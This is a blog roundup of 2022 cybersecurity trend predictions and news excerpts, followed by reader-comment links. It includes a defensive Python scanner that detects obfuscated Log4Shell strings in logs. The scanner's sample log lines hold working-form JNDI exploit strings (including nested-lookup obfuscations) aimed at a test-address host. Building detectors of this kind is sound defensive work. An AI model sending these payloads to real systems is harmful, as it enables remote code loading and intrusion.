Cyber security trends for 2022

Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.

Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.

Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it's a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.

Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks, cyber criminals will likely learn from this year's successful tactics, retool, and pivot them into next year's campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research, development, and investment. Advanced 5G and wireless networks will bring higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored groups and criminal enterprises, are becoming more sophisticated, searching for vulnerabilities and delivering malware by adapting and automating their tooling with machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.

Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original vulnerability (CVE-2021-44228) and the follow-up findings in the same software (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832); the often co-listed CVE-2021-42550 is a related JNDI issue in the separate Logback library, not in Log4j itself.

Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
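The "large number of exploit variations" Akamai mentions, and the "sheer scale" SecurityWeek describes, are the practical problem for anyone triaging logs for Log4Shell attempts: attackers hid the `${jndi:` string behind nested Log4j lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`) and URL encoding, so a plain substring match misses most of them. The following is an added example, not code from either article, that folds those common obfuscations back to what Log4j would actually have evaluated before matching. The access-log lines are constructed for the example, and the protocol list and lookup forms cover the variants commonly reported, not every possible one.

```python
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote

# Inner Log4j 2 lookups that resolve to a literal string. Attackers nested these
# to hide the "jndi" keyword from naive string matching:
#   ${lower:J} / ${upper:n}           -> case-converted text ("j", "N")
#   ${::-j}, ${env:X:-j}, ${sys:X:-j} -> the default value after ":-" ("j")
_LITERAL_LOOKUP = re.compile(
    r"\$\{\s*(lower|upper)\s*:\s*([^${}]*?)\s*\}"   # groups 1,2: ${lower:text}
    r"|\$\{[^${}]*?:-([^${}]*?)\s*\}",              # group 3: ${anything:-default}
    re.IGNORECASE,
)

# After normalization the payload must carry a JNDI lookup naming a remote protocol.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:",
    re.IGNORECASE,
)


def _resolve(m: "re.Match[str]") -> str:
    """Replace one innermost literal-producing lookup with its result."""
    if m.group(1) is not None:                      # ${lower:...} / ${upper:...}
        text = m.group(2)
        return text.lower() if m.group(1).lower() == "lower" else text.upper()
    return m.group(3)                               # ${...:-default}


def normalize(raw: str, max_rounds: int = 20) -> str:
    """Undo URL encoding (single or double) and collapse literal-producing
    lookups from the innermost outward until the string stops changing."""
    text = unquote(unquote(raw))
    for _ in range(max_rounds):      # bounded so malformed input cannot loop forever
        folded = _LITERAL_LOOKUP.sub(_resolve, text)
        if folded == text:
            break
        text = folded
    return text


@dataclass
class Finding:
    line_no: int        # 1-based index into the scanned lines
    protocol: str       # lower-cased JNDI protocol, e.g. "ldap"
    normalized: str     # de-obfuscated line, what Log4j would have evaluated


def scan(lines: List[str]) -> List[Finding]:
    """Return one Finding per log line carrying a (possibly obfuscated) JNDI lookup."""
    findings = []
    for no, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            findings.append(Finding(no, m.group(1).lower(), norm))
    return findings


# Constructed Apache-style access-log lines (not real traffic); addresses are RFC 5737 test ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [12/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}${lower:d}i:${lower:r}mi://198.51.100.7:1099/x}"',
    '203.0.113.9 - - [12/Dec/2021:03:14:13 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [12/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7/a}"',
    '203.0.113.11 - - [12/Dec/2021:03:14:17 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: jndi/{f.protocol}  <- {f.normalized}")
```

Run against the sample, lines 2 to 5 are flagged (ldap, rmi, dns, ldap) while the benign `${date:yyyy}` lookup on line 6 is not. A hit only shows that an exploit string reached a logged field; whether a vulnerable Log4j instance evaluated it, and whether the LDAP or RMI callback succeeded, has to be checked against outbound connection logs, which is exactly why Akamai expects breaches to keep surfacing long after the patching window.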

Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.

Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they've successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.

In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It's what all the clouds, even Microsoft Azure, run. It's what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Linux's real trouble isn't so much with open source itself. There's nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus's law is that given enough eyeballs, all bugs are shallow. But if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I'm now calling Schneier's law, "Security is a process, not a product," points out, constant vigilance is needed to secure all software.

The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development: operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who's going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.

Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We've covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn't not give it a section of its own), and 5 Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question "what happened," incident diagnosis analytics address the question of "why and how it happened." To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities.
• AI will also enable better cyber threat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyber threat intelligence (CTI) reports. CTI reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect cyber threats more rapidly.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.

Mobile phone security is being redone (Kännyköiden tietoturva menee uusiksi)
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has for more than a decade relied on trusted processing in a TEE (Trusted Execution Environment), an isolated execution environment that the processor keeps separate from the main operating system. The current standard solution for smartphone security is typically built on Arm's TrustZone technology. The phone's own security rests on the TEE, and a secure boot chain usually includes one. The TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was introduced roughly 15 years ago).
The memory a TEE requires has not been available in the small microcontrollers used for embedded applications. Manufacturers have promoted secure boot and memory or flash encryption instead, but those have been fairly weak solutions. More recently, Arm's TrustZone for Armv8-M (TrustZone-M) has brought a TEE-like security model to microcontrollers.
In recent years this picture has begun to diversify, and a shift is now under way. Google has introduced keystore technology (Android's hardware-backed Keystore) that lets an application generate a key maintained by the system and use it to authenticate to services; it is still backed by the TEE.
In the future, encryption keys, for example, will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei's Helsinki System Security Lab (HSSL). Some five years ago Intel introduced its SGX technology for PC and server processors: essentially a set of security extension instructions added to the CPU. In this approach, TEE-type protections are provided by a secure enclave, and an enclave needs less trusted code than a traditional TEE structure. An enclave is a temporary structure in the device's memory: it is created for a particular security task and torn down when that task completes. The difference from the TEE model is significant, because there a second kernel runs all the time alongside the operating system. Without that parallel kernel there is one component less to attack.
In Intel's SGX, enclave memory was confined to a small reserved, encrypted region (the Enclave Page Cache), which limited its use. Intel has sought to overcome this limitation with its newer TDX (Trust Domain Extensions) technology, which protects entire virtual machines; AMD aims at the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style structures are also coming to smartphones. The Armv9-A architecture announced last year offers a Realm mode that is very close to the VM-based technologies on the server side (the counterpart of Intel's TDX and AMD's SEV rather than of SGX). With the coming enclaves, an effectively unlimited number of secured environments will be available in principle.
In the mobile ecosystem the TEE is so deeply rooted that the transition will probably take five years. During the transition period the TEE and the more dynamic solutions will coexist on the market.

Cyber attacks already threaten goods deliveries too (Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin)
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools are democratizing cybercrime, extending it from technically savvy individuals and criminal organizations to everyone. The new "Everything as a Service" model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf

Jarno Limnéll warns of a "cyber pandemic": an internet disruption could throw the world into chaos again (Jarno Limnéll varoittaa "kyberpandemiasta": internetin häiriö voi panna maailman taas sekaisin)
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are the scams. And scammers always seem to be one step ahead; sometimes they are only revealed years later. "The world is moving in a direction where technology evolves faster and faster, which rather increases the possibility of various disruptions and creates new types of vulnerabilities. There is no seamless security," Limnéll says. So even with technology, the world will never be finished. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler's rise to power, the shots in Sarajevo. "In light of history, we're always surprised. And if you think about it, technology only adds to the complexity and surprise of crises."

Cyber attacks are accelerating, but companies can respond to them (Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin)
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to remote work has opened up new avenues for attackers, so the attack surface of companies and organizations has grown enormously. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those strategies include:
• Enhanced server security and application management policies to combat extortion
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks

Trend Micro report: in the future everything is at risk (Trend Micron raportti: tulevaisuudessa kaikki on vaarassa)
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.

3,062 Comments

  1. Tomi Engdahl says:

    NAT Router Security Solutions
    Tips & Tricks You Haven’t Seen Before
    https://www.grc.com/nat/nat.htm

  2. Tomi Engdahl says:

    The Next Graphics Card Crisis Could Be The Most Worrying Yet
    https://trib.al/8mtnBdJ

    It’s been more than 12 months now since Forbes warned that the rocketing cost of graphics cards showed no sign of slowing down any time soon. And he was right. Fast forward to now, and a combination of the global semiconductor chip shortage and the demands from cryptocurrency miners mean that high-end cards are still hard to get and cost a small fortune. That is a continuing source of frustration for gamers, and scalpers aren’t helping. The good news is that many industry analysts are hopeful that, pandemic allowing, supply will start to catch up with demand from next year.

    The bad news is that another GPU crisis, potentially longer-lasting and impacting more users, could well be on the cards by then, and it even has a name: DrawnApart.

    The multi-national team of researchers from universities in Australia, France and Israel have demonstrated how GPUs can be used for unique and persistent tracking of your movements across the web. While hardware device fingerprinting is nothing new per se, it’s long been used in conjunction with web browser data to track online user activity for targeted advertising. Fortunately, this combo doesn’t provide those trackers with a privacy-busting knockout punch as inherent limitations cause the power of their punches to fade over time. The researchers suggest that, with browser fingerprinting evolving with usage and tracking becoming less reliable over time, the median shelf life of a modern ‘cutting edge’ user fingerprint is just 17.5 days.

  3. Tomi Engdahl says:

    Sophisticated hackers could crash the US power grid, but money, not sabotage, is their focus
    https://www.utilitydive.com/news/sophisticated-hackers-could-crash-the-us-power-grid-but-money-not-sabotag/603764/

    For now, the capability remains in the hands of nation-state actors. But “sophistication can ultimately be bought,” EEI Vice President for Security and Preparedness Scott Aaronson said.

  4. Tomi Engdahl says:

    Protect Open-Source Software
    Programs anyone can use or modify have been a boon, but there’s a need to address security issues.
    https://www.wsj.com/articles/protect-open-source-software-prevention-oss-public-use-cybersecurity-innovation-cyberattack-apache-log4j-11643316125

    The recent discovery of a vulnerability in Apache log4j, a widely used open-source software tool, has exposed a significant security issue with our digital world. Open-source software (software that can be used, modified and shared by the public) provides common pieces of the programming that underlies much critical software, both public and private.

    Open-source software has been an incredible democratizing and innovative force for the digital world. Its widespread adoption, however, means that security issues can have real-world consequences when a huge proportion of the most popular apps and websites depend on it. This isn’t only an issue for technology companies and their users.

  5. Tomi Engdahl says:

    Silk could tie up all-but-unbreakable encryption, say South Korean boffins
    At last, a worm that improves security
    https://www.theregister.com/2022/01/28/silken_security/

  6. Tomi Engdahl says:

    Homeland Security establishes the Cyber Safety Review Board to learn the mistakes from past cyber incidents
    https://techcrunch.com/2022/02/03/homeland-security-cyber-safety-review-board/

  7. Tomi Engdahl says:

    FBI warns of bogus job postings on recruitment sites https://blog.malwarebytes.com/scams/2022/02/fbi-warns-of-bogus-job-postings-on-recruitment-sites/
    Before Christmas was a busy time down at the fake job factory, with all manner of dubious antics out to ruin someone's day. We're now into February and the bogus job offers show no sign of abating. In fact, the FBI considers it to be such a problem that it's issued an alert.
    This isn't your typical warning about plain old fake job postings, or random messages sent via services like WhatsApp or Telegram though.
    This one involves a dash of the old website exploitation.

  8. Tomi Engdahl says:

    ACTINIUM targets Ukrainian organizations https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/
    The Microsoft Threat Intelligence Center (MSTIC) is sharing information on a threat group named ACTINIUM, which has been operational for almost a decade and has consistently pursued access to organizations in Ukraine or entities related to Ukrainian affairs.
    MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon. In the last six months, MSTIC has observed ACTINIUM targeting organizations in Ukraine spanning government, military, non-government organizations (NGO), judiciary, law enforcement, and non-profit, with the primary intent of exfiltrating sensitive information, maintaining access, and using acquired access to move laterally into related organizations.

  9. Tomi Engdahl says:

    Text Message Scams: How to Recognize, Report and Restrict Them https://www.pandasecurity.com/en/mediacenter/security/text-message-scams/
    Have you ever received an unsolicited text message promising million-dollar cash prizes or a free cruise? Messages like these are scam texts, sent by scammers in an attempt to steal your money or obtain confidential information like bank account numbers or passwords. While text message scams, also known as smishing, might seem harmless, they can wreak havoc on your personal life and finances; consumers lost $86 million to spam texts in 2020. Here's how to protect yourself.

  10. Tomi Engdahl says:

    ISO 27002 and Threat Intelligence: The New Security Standard https://www.recordedfuture.com/iso-27002-threat-intelligence-new-security-standard/
    In recent years, there has been an increased interest in threat intelligence and increased adoption of threat intelligence by security teams around the globe. According to the 2021 SANS Cyber Threat Intelligence (CTI) Survey, there is significant growth among organizations that have just started standing up CTI programs in recent years and steady adoption from organizations that are further along their CTI journey as well.

  11. Tomi Engdahl says:

    A look at the new Sugar ransomware demanding low ransoms https://www.bleepingcomputer.com/news/security/a-look-at-the-new-sugar-ransomware-demanding-low-ransoms/
    A new Sugar Ransomware operation actively targets individual computers, rather than corporate networks, with low ransom demands.
    First discovered by the Walmart Security Team, 'Sugar' is a new Ransomware-as-a-Service (RaaS) operation that launched in November 2021 but has slowly been picking up speed. The name of the ransomware is based on the operation's affiliate site discovered by Walmart at 'sugarpanel[.]space'.

  12. Tomi Engdahl says:

    An ALPHV (BlackCat) representative discusses the group's plans for a ransomware meta-universe https://therecord.media/an-alphv-blackcat-representative-discusses-the-groups-plans-for-a-ransomware-meta-universe/
    A representative from the group, which has also been called BlackCat in some reports, agreed to talk to Recorded Future analyst Dmitry Smilyanets about the group's background, intentions, and plans for the future. The interview was conducted in Russian via TOX messaging, and was translated to English with the help of a linguist from Recorded Future's Insikt Group. It has been lightly edited for clarity.

  13. Tomi Engdahl says:

    HHS: Conti ransomware encrypted 80% of Ireland’s HSE IT systems https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/
    A threat brief published by the US Department of Health and Human Services (HHS) on Thursday paints a grim picture of how Ireland's health service, the HSE, was overwhelmed and had 80% of its systems encrypted during last year's Conti ransomware attack. This led to severe disruptions of healthcare services throughout Ireland and exposed the information of thousands of Irish people who received COVID-19 vaccines before the attack, after roughly 700 GB of data (including protected health information) was stolen from HSE's network and sent to attackers' servers.

  14. Tomi Engdahl says:

    The Alpha and Omega of software supply chain security https://www.zdnet.com/article/the-alpha-and-omega-of-software-supply-chain-security/
    What is the Alpha-Omega Project? Its purpose is to “improve global open source software supply chain security by working with project maintainers to systematically look for new, as-yet-undiscovered vulnerabilities in open-source code” and then fix them. This is vital to improving open-source security. To make this happen, the Linux Foundation’s partner group — Open Source Security Foundation (OpenSSF), Google, and Microsoft — are joining forces to work with security experts and use automated security testing to improve open-source security. Microsoft and Google are bringing an initial investment of $5 million to the Alpha-Omega Project.

  15. Tomi Engdahl says:

    The White House Memo on Adopting a Zero Trust Architecture: Top Four Tips https://blogs.cisco.com/security/the-white-house-memo-on-adopting-a-zero-trust-architecture-top-four-tips
    On the heels of President Biden's Executive Order on Cybersecurity (EO 14028), the Office of Management and Budget (OMB) has released a memorandum addressing the heads of executive departments and agencies that sets forth a Federal zero trust architecture (ZTA) strategy. My good friend and fellow Advisory CISO Helen Patton has done a great summary of the memo in a previous blog.
  16. Tomi Engdahl says:

    FBI shares Lockbit ransomware technical details, defense tips https://www.bleepingcomputer.com/news/security/fbi-shares-lockbit-ransomware-technical-details-defense-tips/
    The Federal Bureau of Investigation (FBI) has released technical details and indicators of compromise associated with LockBit ransomware attacks in a new flash alert published this Friday. It also provided information to help organizations block this adversary’s attempts to breach their networks and asked victims to urgently report such incidents to their local FBI Cyber Squad. The LockBit ransomware gang has been very active since September 2019 when it launched as a ransomware-as-a-service (RaaS), with gang representatives promoting the operation, providing support on Russian-language hacking forums, and recruiting threat actors to breach and encrypt networks.

  17. Tomi Engdahl says:

    Why Cyber Change Outpaces Boardroom Engagement https://www.trendmicro.com/en_us/research/22/b/why-cyber-change-outpaces-boardroom-engagement.html
    Humans are addicted to stories. But sometimes the stories we tell are overly simplistic. In cybersecurity, a recurring narrative is one of C-suite executives perpetually at odds with IT leaders. They're disinterested in what the security team does, and release funds begrudgingly and often reactively once a serious incident has occurred. This leads to mounting cyber risk, and an increasing likelihood that the organization will suffer serious reputational and financial damage stemming from future incidents, or so the story goes.
  18. Tomi Engdahl says:

    Fortune 500 service provider says ransomware attack led to leak of more than 500k SSNs https://www.zdnet.com/article/fortune-500-service-provider-says-ransomware-attack-led-to-leak-of-more-than-500k-ssns-more/
    Morley Companies, an organization that provides business services to dozens of Fortune 500 companies, said this week it was hit with a ransomware attack last year that led to the leak of sensitive information for more than 500,000 people. In a press release, the company said the ransomware attack began on August 1 and made their data “unavailable.” Despite requests for comment, the company would not explain why it waited until now to notify the 521,046 people affected, some of whom had their Social Security numbers leaked in the attack.

  19. Tomi Engdahl says:

    Think before you scan: How fraudsters can exploit QR codes to steal money https://www.welivesecurity.com/2022/02/04/think-before-scan-how-fraudsters-exploit-qr-codes/
    QR codes are having a moment. The humble squares may have been around since 1994, but it wasn't until the COVID-19 era that they became a truly household name. These days, you can spot them all over the place, with the codes put to use for everything from displaying restaurant menus to facilitating contactless transactions to being built into contact tracing apps. Much like any other popular technology, however, the widespread use of QR codes has also caught the attention of scammers, who have co-opted them for nefarious purposes.
  20. Tomi Engdahl says:

    Long Live Log4Shell: CVE-2021-44228 Not Dead Yet https://threatpost.com/log4shell-cve-2021-44228/178225/
    Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), stated in a public news interview that the now-infamous Log4j flaw is "the most serious vulnerability that [she has] seen in her career." It's not a stretch to say the whole security industry would agree. December of 2021 will be looked back on with a tinge of trauma and dread for incident responders, system administrators and security practitioners. You all probably already know that on December 9, a remote code execution vulnerability was uncovered in the programming library named Log4j, which is nearly ubiquitous in Java applications and software used all across the internet.
  21. Tomi Engdahl says:

    Column: A cyber strike on Finland
    https://www.tivi.fi/uutiset/tv/7ed73335-6dfe-421a-97c8-7876e3091ae2
    "Sano EI Natolle" (Say NO to NATO). I stared at the blood-red letters that had appeared on the computer screen. There was no room for misreading, because below it the same was written in English: Say no to Nato. Where had the Swedish gone, I wondered, bewildered. This was supposed to be Yle's news page, which, following an old routine, I opened first thing in the morning. But this morning there was no news, except for one item: Finland had been hit by a cyberattack. THE EVENTS DESCRIBED ABOVE are, fortunately, fiction. They could, however, be a Finnish version of what happened in Ukraine in mid-January. How would we act in a similar situation?
  22. Tomi Engdahl says:

    Law enforcement action push ransomware gangs to surgical attacks https://www.bleepingcomputer.com/news/security/law-enforcement-action-push-ransomware-gangs-to-surgical-attacks/
